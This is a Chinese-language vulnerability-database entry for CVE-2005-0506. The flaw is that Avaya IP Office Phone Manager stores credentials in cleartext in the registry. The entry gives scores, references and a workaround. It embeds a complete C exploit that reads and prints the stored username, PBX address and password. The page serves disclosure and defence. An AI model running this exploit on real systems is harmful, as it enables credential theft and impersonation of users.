CVE-2005-0506
CVSS5.0
发布时间 :2005-03-14 00:00:00
修订时间 :2016-10-17 23:12:12
NMCOE    

[原文]The Avaya IP Office Phone Manager, and other products such as the IP Softphone, stores sensitive data in cleartext in a registry key, which allows local and possibly remote users to steal usernames and passwords and impersonate other users via keys such as Avaya\IP400\Generic.


[CNNVD]Avaya 敏感信息泄露漏洞(CNNVD-200503-108)

        Avaya IP Office Phone Manager及IP Softphone等其他产品将明文敏感数据存放在注册表键中,本地及可能的远程用户可以通过Avaya\IP400\Generic等键窃取用户名和密码,并假冒其他用户。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:avaya:ip_office_phone_managerAvaya IP Office Phone Manager
cpe:/a:avaya:ip_soft_phoneAvaya IP Softphone

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0506
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0506
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200503-108
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=110909733831694&w=2
(UNKNOWN)  BUGTRAQ  20050222 Avaya IP Office Phone Manager - Sensitive Information Cleartext
http://marc.info/?l=bugtraq&m=110910486128709&w=2
(UNKNOWN)  BUGTRAQ  20050222 Re: Avaya IP Office Phone Manager - Sensitive Information Cleartext Vulnerability
http://support.avaya.com/elmodocs2/security/ASA-2005-041_Sensitive_Info_Leak.pdf
(VENDOR_ADVISORY)  CONFIRM  http://support.avaya.com/elmodocs2/security/ASA-2005-041_Sensitive_Info_Leak.pdf

- 漏洞信息

Avaya 敏感信息泄露漏洞
中危 未知
2005-03-14 00:00:00 2005-10-20 00:00:00
远程  
        Avaya IP Office Phone Manager及IP Softphone等其他产品将明文敏感数据存放在注册表键中,本地及可能的远程用户可以通过Avaya\IP400\Generic等键窃取用户名和密码,并假冒其他用户。

- 公告与补丁

        

- 漏洞信息 (839)

Avaya IP Office Phone Manager Local Password Disclosure Exploit (EDBID:839)
windows local
2005-02-24 Verified
0 Adrian "pagvac" Pastor
N/A [点击下载]
#include <windows.h>
#include <stdio.h>
#include <string.h>

/*
               Filename:               exploit.c
               Title:          Avaya IP Office Phone Manager - Cleartext Sensitive Data Vulnerability Exploit v0.01
               Author:         pagvac (Adrian Pastor)
               Date:                   24th Feb, 2005
               Other info:             tested on version 2.013. Compile as a Win32 console application project in Visual C++
*/

BOOL QueryVal(char lszVal2Query[255], char lszValData[255])
{
    char lszResult[255];
    HKEY hKey;
    LONG returnStatus;
    DWORD dwType=REG_SZ;
    DWORD dwSize=255;
    returnStatus = RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\AVAYA\\IP400\\GENERIC", 0L, KEY_READ, &hKey);

        if (returnStatus == ERROR_SUCCESS)
    {
                returnStatus = RegQueryValueEx(hKey, lszVal2Query, NULL, &dwType,(LPBYTE)&lszResult, &dwSize);
         if (returnStatus == ERROR_SUCCESS)
         {
                          strcpy(lszValData, lszResult);
         }
                 RegCloseKey(hKey);
                 return TRUE;
    }
        else
        {
                RegCloseKey(hKey);
                return FALSE;
    }
}

void main()
{
       char valData[255];

       printf("\nAvaya IP Office Phone Manager - Cleartext Sensitive Data Vulnerability Exploit\n");
       printf("By pagvac (Adrian Pastor)\n");
       printf("Tested on version 2.013\n\n");

       // Print username
       printf("Username:\t");
       if(!QueryVal("UserName", valData))
               printf("Error! No permissions to read key value?\n");
       else
               printf("%s\n", valData);

       // Print IP address
       printf("PBX IP Address:\t");
       if(!QueryVal("PBXAddress", valData))
               printf("Error! No permissions to read key value?\n");
       else
               printf("%s\n", valData);

       // Print password
       printf("Password:\t");
       if(!QueryVal("Password", valData))
               printf("Error! No permissions to read key value?\n");
       else
       {

               if(strcmp(valData, "")==0)
                       printf("[blank password]\n\n");
               else
               {
                       printf("%s\n", valData);
                       printf("Password obsfucated?\n\n");
               }
       }

}

// milw0rm.com [2005-02-24]
		

- 漏洞信息

14206
Avaya IP Office Phone Manager Registry Cleartext Auth Credential Storage
Local Access Required Cryptographic, Information Disclosure
Loss of Confidentiality
Exploit Public

- 漏洞描述

IP office phone manager contains a flaw that may lead to an unauthorized password exposure. It is possible for any local user to gain access to encrypted passwords that are stored in the registry, which may lead to a loss of confidentiality.

- 时间线

2005-02-22 Unknow
2005-02-22 Unknow

- 解决方案

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround(s): Restrict access to Windows registry and/or disable "Remember save password" feature.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站